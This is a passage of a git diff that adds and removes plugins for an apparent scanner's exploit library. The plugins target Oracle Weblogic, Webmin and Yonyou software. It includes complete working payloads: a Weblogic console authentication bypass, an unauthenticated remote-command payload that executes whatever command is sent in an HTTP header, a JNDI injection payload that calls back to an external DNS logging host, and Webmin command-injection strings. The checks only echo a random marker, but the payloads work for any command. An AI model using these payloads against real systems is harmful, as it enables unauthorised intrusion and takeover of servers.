+                'path-2': '{FILENAME}.jsp',
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+
+        vul_info = {
+            'app_name': 'Weblogic',
+            'vul_type': 'unSerialize',
+            'vul_id': 'CVE-2019-2725',
+        }
+
+        headers = {
+            'Content-Type': 'text/xml'
+        }
+
+        for payload in self.payloads:
+            randomFileName = random_md5()
+            randomStr = random_md5()
+            
+            path_1 = payload['path-1']
+            data_1 = payload['data-1'].format(FILENAME=randomFileName, RCEMD=randomStr)
+            path_2 = payload['path-2'].format(FILENAME=randomFileName)
+
+            res1 = client.request(
+                'post',
+                path_1,
+                data=data_1,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res1 is None:
+                continue
+
+            sleep(3)                    # * 延时, 因为命令执行生成文件可能有延迟, 要等一会判断结果才准确
+
+            res2 = client.request(
+                'get',
+                path_2,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res2 is None:
+                continue
+
+            if ((res2.status_code == 200) and (randomStr in res2.text)):
+                results = {
+                    'Target': res1.request.url,
+                    'Verify': res2.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request-1': res1,
+                    'Request-2': res2,
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Weblogic/oracle-weblogic-cve-2020-14750-bypass.py b/payloads/Weblogic/oracle-weblogic-cve-2020-14750-bypass.py
new file mode 100644
index 0000000..61aaa08
--- /dev/null
+++ b/payloads/Weblogic/oracle-weblogic-cve-2020-14750-bypass.py
@@ -0,0 +1,83 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Weblogic 权限验证绕过漏洞
+    CVE-2020-14750
+        Payload: AWVS
+
+Weblogic 权限验证绕过漏洞
+    可通过目录跳转符../回到上一级目录, 然后在../后面拼接console后台目录,
+        即可绕过后台登录, 直接进入后台
+'''
+
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'images/%252E./console.portal'},
+            {'path': 'images/%252e%252e%252fconsole.portal'},
+            {'path': 'css/%252E./console.portal'},
+            {'path': 'css/%252e%252e%252fconsole.portal'},
+            {'path': 'console/images/%252E./console.portal'},
+            {'path': 'console/images/%252e%252e%252fconsole.portal'},
+            {'path': 'console/css/%252E./console.portal'},
+            {'path': 'console/css/%252e%252e%252fconsole.portal'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+
+        vul_info = {
+            'app_name': 'Weblogic',
+            'vul_type': 'unAuthorized',
+            'vul_id': 'CVE-2020-14750',
+        }
+        
+        headers = {}
+
+        for payload in self.payloads:
+            path = payload['path']
+
+            res1 = client.request(
+                'get',
+                path,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res1 is None:
+                continue
+
+            if ((res1.status_code == 302) and (res1.headers.get('Set-Cookie'))):
+                cookie = {
+                    'Cookie': res1.headers.get('Set-Cookie', '')
+                }
+                headers.update(cookie)
+
+                res2 = client.request(
+                    'get',
+                    path,
+                    headers=headers,
+                    vul_info=vul_info
+                )
+                if res2 is None:
+                    continue
+
+                if (('管理控制台' in res2.text) 
+                    or ('Information and Resources' in res2.text) 
+                    or ('Overloaded' in res2.text)):
+                    results = {
+                        'Target': res2.request.url,
+                        'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                        'Cookie': cookie['Cookie'],
+                        'Request': res2,
+                    }
+                    return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Weblogic/oracle-weblogic-cve-2020-14882-rce-unauth.py b/payloads/Weblogic/oracle-weblogic-cve-2020-14882-rce-unauth.py
new file mode 100644
index 0000000..abdda0e
--- /dev/null
+++ b/payloads/Weblogic/oracle-weblogic-cve-2020-14882-rce-unauth.py
@@ -0,0 +1,72 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Weblogic 管理控制台未授权远程命令执行
+    CVE-2020-14882
+
+Weblogic 管理控制台未授权远程命令执行
+    配合CVE-2020-14750未授权进入后台, 调用相关接口实现命令执行
+'''
+
+from lib.tool.md5 import random_md5
+from lib.tool import check
+import http.client
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'images/%252E./consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(\'weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();\')'},
+            {'path': 'images/%252e%252e%252fconsolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(\'weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();\')'},
+            {'path': 'console/images/%252E./consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(\'weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();\')'},
+            {'path': 'console/images/%252e%252e%252fconsolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(\'weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();\')'}
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+
+        vul_info = {
+            'app_name': 'Weblogic',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2020-14882',
+        }
+
+        randomStr = random_md5(6)
+        RCEcommand = 'echo ' + randomStr
+        
+        headers = {
+            'cmd': RCEcommand
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+
+            # * 有时候用HTTP1.1会报错, 使用HTTP1.0试试
+            # http.client.HTTPConnection._http_vsn = 10
+            # http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
+            res = client.request(
+                'get',
+                path,
+                headers=headers,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+            # http.client.HTTPConnection._http_vsn = 11
+            # http.client.HTTPConnection._http_vsn_str = 'HTTP/1.1'
+
+            if (check.check_res(res.text, randomStr)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Weblogic/oracle-weblogic-cve-2021-2109-rce.py b/payloads/Weblogic/oracle-weblogic-cve-2021-2109-rce.py
new file mode 100644
index 0000000..fb943b8
--- /dev/null
+++ b/payloads/Weblogic/oracle-weblogic-cve-2021-2109-rce.py
@@ -0,0 +1,102 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Weblogic LDAP 远程代码执行漏洞
+    CVE-2021-2109
+        Payload: http://wiki.peiqi.tech/wiki/webserver/Weblogic/Weblogic%20LDAP%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2021-2109.html
+                 https://www.freebuf.com/vuls/261710.html
+                 https://github.com/WhiteHSBG/JNDIExploit/
+
+CVE-2021-2109中，攻击者可构造恶意请求，造成JNDI注入，执行任意代码，从而控制服务器
+'''
+
+from lib.api.dns import dns
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://DNSDOMAIN/aksm;AdminServer%22)'},
+            {'path': 'console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22rmi://DNSDOMAIN/aksm;AdminServer%22)'},
+            {'path': 'console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22dns//DNSDOMAIN/aksm;AdminServer%22)'},
+            {'path': 'css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://DNSDOMAIN/dpqm;AdminServer%22)'},
+            {'path': 'css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22rmi://DNSDOMAIN/dpqm;AdminServer%22)'},
+            {'path': 'css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22dns://DNSDOMAIN/dpqm;AdminServer%22)'},
+            {'path': 'console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://DNSDOMAIN/qsju;AdminServer%22)'},
+            {'path': 'console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22rmi://DNSDOMAIN/qsju;AdminServer%22)'},
+            {'path': 'console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22dns://DNSDOMAIN/qsju;AdminServer%22)'},
+            {'path': 'consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://DNSDOMAIN/apso;AdminServer%22)'},
+            {'path': 'consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22rmi://DNSDOMAIN/apso;AdminServer%22)'},
+            {'path': 'consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22dns://DNSDOMAIN/apso;AdminServer%22)'},
+
+            # * 请求太多了, POST的Payload就先不用了
+            # {
+            #     'path': 'console/css/%252e%252e/consolejndi.portal',
+            #     'data': '_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xxx;xxx:1389/abc;AdminServer%22)',
+            # },
+            # {
+            #     'path': 'console/consolejndi.portal',
+            #     'data': '_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://DNSDOMAIN/asd;AdminServer%22)',
+            # },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        sessid = '44e10e50016cd558fda134f11a5c88ec'
+        
+        vul_info = {
+            'app_name': 'Weblogic',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2021-2109',
+        }
+        
+        headers = {
+            'Referer': client.protocol_domain,
+            'Origin': client.protocol_domain,
+        }
+
+        for payload in self.payloads:
+            md = random_md5()                                       # * 随机md5值, 8位
+            dnsDomain = md + '.' + dns.domain(sessid)               # * DNSLOG域名
+            
+            # * ---------------该漏洞特性, 192.168.1;1 其中第三个位置的.需要换成分号;
+            domainList = dnsDomain.split('.')
+            newDnsDomain = ''
+            
+            for i in range(len(domainList)):
+                if (i == len(domainList) - 1):
+                    newDnsDomain += ';' + domainList[i]
+                    break
+                
+                newDnsDomain += '.' + domainList[i]
+            # * ---------------该漏洞特性, 192.168.1;1 其中第三个位置的.需要换成分号;
+            
+            path = payload['path'].replace('DNSDOMAIN', newDnsDomain[1:])  # * [0]是符号. 需要去掉
+            # data = payload['data']
+
+            res = client.request(
+                'get',
+                path,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (dns.result(md, sessid)):
+                results = {
+                    'Target': res.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Webmin/cve_2019_15107.py b/payloads/Webmin/cve_2019_15107.py
deleted file mode 100644
index f27c370..0000000
--- a/payloads/Webmin/cve_2019_15107.py
+++ /dev/null
@@ -1,55 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-from lib.tool import check
-
-cve_2019_15107_payloads = [
-    {
-        'path': 'password_change.cgi',
-        'data': 'user=rootxx&pam=&expired=2&old=test|{RCECOMMAND}&new1=test2&new2=test2'
-    },
-]
-
-def cve_2019_15107_scan(clients):
-    ''' 该漏洞存在于密码重置页面(password_change.cgi), 允许未经身份验证的用户通过简单的POST请求执行任意命令
-        当用户开启Webmin密码重置功能后, 攻击者可以通过发送POST请求在目标系统中执行任意命令, 且无需身份验证。
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'Webmin',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2019-15107',
-    }
-
-    headers = {
-        'Referer': '{}/session_login.cgi'.format(client.protocol_domain)
-    }
-
-    for payload in cve_2019_15107_payloads:
-        randomStr = random_md5()
-        RCEcommand = 'echo ' + randomStr
-        
-        path = payload['path']
-        data = payload['data'].format(RCECOMMAND=RCEcommand)
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res(res.text, randomStr)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Webmin/cve_2019_15642.py b/payloads/Webmin/cve_2019_15642.py
deleted file mode 100644
index bae8181..0000000
--- a/payloads/Webmin/cve_2019_15642.py
+++ /dev/null
@@ -1,65 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-from lib.tool import check
-
-cve_2019_15642_payloads = [
-    {
-        'path': 'rpc.cgi',
-        'data': 'OBJECT Socket;print "Content-Type: text/plain\\n\\n";$cmd=`{RCECOMMAND}`; print "$cmd\\n\\n";',
-        'headers': {}
-    },
-    {
-        'path': 'rpc.cgi',
-        'data': 'OBJECT Socket;print "Content-Type: text/plain\\n\\n";$cmd=`{RCECOMMAND}`; print "$cmd\\n\\n";',
-        'headers': {
-            'User-Agent': 'webmin',
-            'Accept': 'application/json, text/javascript, */*; q=0.01',
-            'Accept-Language': 'fr',
-            'Accept-Encoding': 'gzip, deflate'
-        }
-    },
-]
-
-def cve_2019_15642_scan(clients):
-    ''' Webmin 1.920及之前版本中的rpc.cgi文件存在安全漏洞, 攻击者可借助特制的对象名称利用该漏洞执行代码
-            需要身份验证(Cookie、Authorization等)
-    '''
-    client = clients.get('reqClient')
-
-    vul_info = {
-        'app_name': 'Webmin',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2019-15642',
-    }
-
-    for payload in cve_2019_15642_payloads:
-        randomStr = random_md5()
-        RCEcommand = 'echo ' + randomStr
-        
-        path = payload['path']
-        data = payload['data'].format(RCECOMMAND=RCEcommand)
-        headers = payload['headers']
-
-        headers['Referer'] = '{}/session_login.cgi'.format(client.protocol_domain)
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res(res.text, randomStr)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Webmin/main.py b/payloads/Webmin/main.py
deleted file mode 100644
index 1464e0b..0000000
--- a/payloads/Webmin/main.py
+++ /dev/null
@@ -1,37 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-Webmin是一个基于Web的系统配置工具, 用于类Unix系统: https://www.webmin.com/
-    Webmin扫描类: 
-        1. Webmin Pre-Auth 远程代码执行
-            CVE-2019-15107
-                Payload: https://vulhub.org/#/environments/webmin/CVE-2019-15107/
-
-        2. Webmin 远程代码执行
-            CVE-2019-15642
-                Payload: https://www.seebug.org/vuldb/ssvid-98065
-
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Webmin.cve_2019_15107 import cve_2019_15107_scan
-from payloads.Webmin.cve_2019_15642 import cve_2019_15642_scan
-
-class Webmin():
-    def __init__(self):
-        self.app_name = 'Webmin'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2019_15107_scan, clients=clients),
-            thread(target=cve_2019_15642_scan, clients=clients)
-        ]
-
-webmin = Webmin()
diff --git a/payloads/Webmin/webmin-cve-2019-15107-rce.py b/payloads/Webmin/webmin-cve-2019-15107-rce.py
new file mode 100644
index 0000000..8a7b118
--- /dev/null
+++ b/payloads/Webmin/webmin-cve-2019-15107-rce.py
@@ -0,0 +1,72 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Webmin Pre-Auth 远程代码执行
+    CVE-2019-15107
+        Payload: https://vulhub.org/#/environments/webmin/CVE-2019-15107/
+
+该漏洞存在于密码重置页面(password_change.cgi)
+    允许未经身份验证的用户通过简单的POST请求执行任意命令
+    当用户开启Webmin密码重置功能后,
+        攻击者可以通过发送POST请求在目标系统中执行任意命令, 且无需身份验证。
+'''
+
+from lib.tool.md5 import random_md5
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'password_change.cgi',
+                'data': 'user=rootxx&pam=&expired=2&old=test|{RCECOMMAND}&new1=test2&new2=test2'
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Webmin',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2019-15107',
+        }
+
+        headers = {
+            'Referer': '{}/session_login.cgi'.format(client.protocol_domain)
+        }
+
+        for payload in self.payloads:
+            randomStr = random_md5()
+            RCEcommand = 'echo ' + randomStr
+            
+            path = payload['path']
+            data = payload['data'].format(RCECOMMAND=RCEcommand)
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res(res.text, randomStr)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Webmin/webmin-cve-2019-15642-rce.py b/payloads/Webmin/webmin-cve-2019-15642-rce.py
new file mode 100644
index 0000000..692e76a
--- /dev/null
+++ b/payloads/Webmin/webmin-cve-2019-15642-rce.py
@@ -0,0 +1,80 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Webmin 远程代码执行
+    CVE-2019-15642
+        Payload: https://www.seebug.org/vuldb/ssvid-98065
+
+Webmin 1.920及之前版本中的rpc.cgi文件存在安全漏洞, 攻击者可借助特制的对象名称利用该漏洞执行代码
+    需要身份验证(Cookie、Authorization等)
+'''
+
+from lib.tool.md5 import random_md5
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'rpc.cgi',
+                'data': 'OBJECT Socket;print "Content-Type: text/plain\\n\\n";$cmd=`{RCECOMMAND}`; print "$cmd\\n\\n";',
+                'headers': {}
+            },
+            {
+                'path': 'rpc.cgi',
+                'data': 'OBJECT Socket;print "Content-Type: text/plain\\n\\n";$cmd=`{RCECOMMAND}`; print "$cmd\\n\\n";',
+                'headers': {
+                    'User-Agent': 'webmin',
+                    'Accept': 'application/json, text/javascript, */*; q=0.01',
+                    'Accept-Language': 'fr',
+                    'Accept-Encoding': 'gzip, deflate'
+                }
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+
+        vul_info = {
+            'app_name': 'Webmin',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2019-15642',
+        }
+
+        for payload in self.payloads:
+            randomStr = random_md5()
+            RCEcommand = 'echo ' + randomStr
+            
+            path = payload['path']
+            data = payload['data'].format(RCECOMMAND=RCEcommand)
+            headers = payload['headers']
+
+            headers['Referer'] = '{}/session_login.cgi'.format(client.protocol_domain)
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res(res.text, randomStr)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Yonyou/cnnvd_201610_923.py b/payloads/Yonyou/cnnvd_201610_923.py
deleted file mode 100644
index 2dcab26..0000000
--- a/payloads/Yonyou/cnnvd_201610_923.py
+++ /dev/null
@@ -1,52 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-import re
-
-cnnvd_201610_923_payloads = [
-    {
-        'path': 'Proxy',
-        'data': 'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">select@@version</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>'
-    },
-    {
-        'path': 'Proxy',
-        'data': 'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select user,db_name(),host_name(),@@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>'
-    }
-]
-
-def cnnvd_201610_923_scan(clients):
-    '''  
-        用友GRP-u8存在XXE漏洞, 该漏洞源于应用程序解析XML输入时没有禁止外部实体的加载, 导致可加载外部SQL语句
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'Yonyou-GRP-U8',
-        'vul_type': 'SQLinject/RCE',
-        'vul_id': 'CNNVD-201610-923',
-    }
-
-    for payload in cnnvd_201610_923_payloads:
-        path = payload['path']
-        data = payload['data']
-        
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        version_re = r'column[1-4]{1}="Microsoft SQL Server \d{1,5} -.*Copyright.*Microsoft Corporation.*"'
-
-        if (re.search(version_re, res.text, re.I|re.M|re.S|re.U)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Yonyou/cnvd_2021_30167.py b/payloads/Yonyou/cnvd_2021_30167.py
deleted file mode 100644
index 1e8c9aa..0000000
--- a/payloads/Yonyou/cnvd_2021_30167.py
+++ /dev/null
@@ -1,106 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_int_2
-
-cnvd_2021_30167_payloads = [
-    {
-        'path': 'servlet/~ic/bsh.servlet.BshServlet',
-        # 'data': 'bsh.script=print%28{}*{}%29%3B'.format(randomNum_1, randomNum_2)
-    },
-    {'path': 'service/~aim/bsh.servlet.BshServlet'},
-    {'path': 'service/~alm/bsh.servlet.BshServlet'},
-    {'path': 'service/~ampub/bsh.servlet.BshServlet'},
-    {'path': 'service/~arap/bsh.servlet.BshServlet'},
-    {'path': 'service/~aum/bsh.servlet.BshServlet'},
-    {'path': 'service/~cc/bsh.servlet.BshServlet'},
-    {'path': 'service/~cdm/bsh.servlet.BshServlet'},
-    {'path': 'service/~cmp/bsh.servlet.BshServlet'},
-    {'path': 'service/~ct/bsh.servlet.BshServlet'},
-    {'path': 'service/~dm/bsh.servlet.BshServlet'},
-    {'path': 'service/~erm/bsh.servlet.BshServlet'},
-    {'path': 'service/~fa/bsh.servlet.BshServlet'},
-    {'path': 'service/~fac/bsh.servlet.BshServlet'},
-    {'path': 'service/~fbm/bsh.servlet.BshServlet'},
-    {'path': 'service/~ff/bsh.servlet.BshServlet'},
-    {'path': 'service/~fip/bsh.servlet.BshServlet'},
-    {'path': 'service/~fipub/bsh.servlet.BshServlet'},
-    {'path': 'service/~fp/bsh.servlet.BshServlet'},
-    {'path': 'service/~fts/bsh.servlet.BshServlet'},
-    {'path': 'service/~fvm/bsh.servlet.BshServlet'},
-    {'path': 'service/~gl/bsh.servlet.BshServlet'},
-    {'path': 'service/~hrhi/bsh.servlet.BshServlet'},
-    {'path': 'service/~hrjf/bsh.servlet.BshServlet'},
-    {'path': 'service/~hrpd/bsh.servlet.BshServlet'},
-    {'path': 'service/~hrpub/bsh.servlet.BshServlet'},
-    {'path': 'service/~hrtrn/bsh.servlet.BshServlet'},
-    {'path': 'service/~hrwa/bsh.servlet.BshServlet'},
-    {'path': 'service/~ia/bsh.servlet.BshServlet'},
-    {'path': 'service/~ic/bsh.servlet.BshServlet'},
